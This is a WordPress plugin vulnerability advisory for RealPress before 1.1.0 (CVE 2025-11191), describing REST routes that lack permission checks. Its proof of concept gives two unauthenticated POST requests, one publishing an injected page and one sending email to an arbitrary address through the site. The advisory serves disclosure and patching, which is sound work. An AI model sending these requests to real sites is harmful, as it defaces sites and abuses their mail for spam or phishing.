RealPress < 1.1.0 – Unauthenticated Content Creation/Email Sending via REST | CVE 2025-11191 | Plugin Vulnerabilities

Description

The plugin registers the REST routes without proper permission checks, allowing the creation of pages and sending of emails from the site.

Proof of Concept

Page Creation:

POST /wp-json/realpress/v1/page
Content-Type: application/json
Body:
{
  "title": "Injected Page",
  "content": "<h1>owned</h1>",
  "post_type": "page",
  "post_status": "publish"
}

Email Sending:

POST /wp-json/realpress/v1/contact-form
Content-Type: application/json
Body:
{
  "email_target": "victim@example.com",
  "name": "attacker",
  "phone": "000",
  "email": "from@example.com",
  "message": "test",
  "terms_and_conditions": "on",
  "cc_admin": "on"
}

Affects Plugins

Fixed in 1.1.0

References

CVE

Classification

Type

NO AUTHORISATION

OWASP top 10

A5: Broken Access Control

CWE

CVSS

Miscellaneous

Original Researcher

Khaled Alenazi (Nxploited)

Submitter

Khaled Alenazi (Nxploited)

Verified

Yes

WPVDB ID

74f19ff2-d5c0-4bd4-83f2-688ea37022b1

Timeline

Publicly Published

2025-10-10 (about 2 months ago)

Added

2025-10-10 (about 2 months ago)

Last Updated

2025-10-10 (about 2 months ago)

Other

Published

Title

Published

2025-09-22

Title

Revive.so < 2.0.7 - Missing Authorization

Published

2025-10-08

Title

Slider Revolution < 6.7.38 - Contributor+ Arbitrary File Read

Published

2023-11-21

Title

WCMultiShipping < 2.3.6 - Missing Authorization to Log Export

Published

2025-09-26

Title

Netgsm <= 2.9.58 - Missing Authorization

Published

2025-04-09

Title

Embedder 1.3 - 1.3.5 - Authenticated (Subscriber+) Arbitrary Options Update